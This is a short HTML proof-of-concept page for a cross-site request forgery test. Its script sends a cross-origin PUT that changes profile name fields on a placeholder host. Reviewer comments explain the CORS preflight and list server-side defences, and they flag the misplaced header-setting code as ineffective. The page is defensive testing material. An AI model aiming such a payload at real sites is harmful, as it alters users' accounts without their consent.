- <!DOCTYPE html>
- <html>
- <head>
- <title>Exploit</title>
- <meta charset="utf-8">
- </head>
- <body>
<!--
  Proof-of-concept page for a cross-site request forgery (CSRF) test.
  Clicking the button calls csrf(), which sends a PUT request with a JSON
  body to the members/name endpoint on next.target.com.

  Reviewer notes, read from the defending side:
  * PUT is not a CORS "simple" method, so when this page is served from a
    different origin the browser sends a preflight OPTIONS request first.
    Whether the PUT is delivered at all depends on how the endpoint answers
    that preflight.
  * Server-side controls to verify for an endpoint like this: the CORS
    policy allows only known origins (no reflected Origin value), every
    state-changing request carries an anti-CSRF token or passes an Origin
    check, and session cookies set the SameSite attribute.
-->
- <button type='button' onclick='csrf()'>CSRF</button>
- <script>
// Builds and sends the name-change request. Returns nothing and never reads
// the response body.
- function csrf(){
- var xh = new XMLHttpRequest();
// The handler runs on every state change; the branch inside it is taken only
// once the response is complete (readyState 4) with HTTP status 200.
- xh.onreadystatechange = function(){
- if (this.readyState == 4 && this.status == 200) {
// NOTE(review): setRequestHeader() is only valid between open() and send().
// These four calls run after the response has arrived, so they cannot affect
// the request that was sent. "Referer" is also a forbidden header name that
// page script is not allowed to set.
- xh.setRequestHeader("User-Agent", "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0");
- xh.setRequestHeader("Accept", "application/json, text/plain, */*");
- xh.setRequestHeader("Referer", "https://next.target.com/account");
- xh.setRequestHeader("Content-Type", "application/json;charset=utf-8");
- }
- };
// Asynchronous (third argument true) PUT to the members/name endpoint.
- xh.open("PUT", "https://next.target.com/proxy/api/members/name", true);
// Fixed sample values; presumably the profile fields the endpoint updates.
- var data = {experienceId:"21",firstName:"csed",lastName:"baset"};
- xh.send(JSON.stringify(data));
- }
- </script>
- </body>
- </html>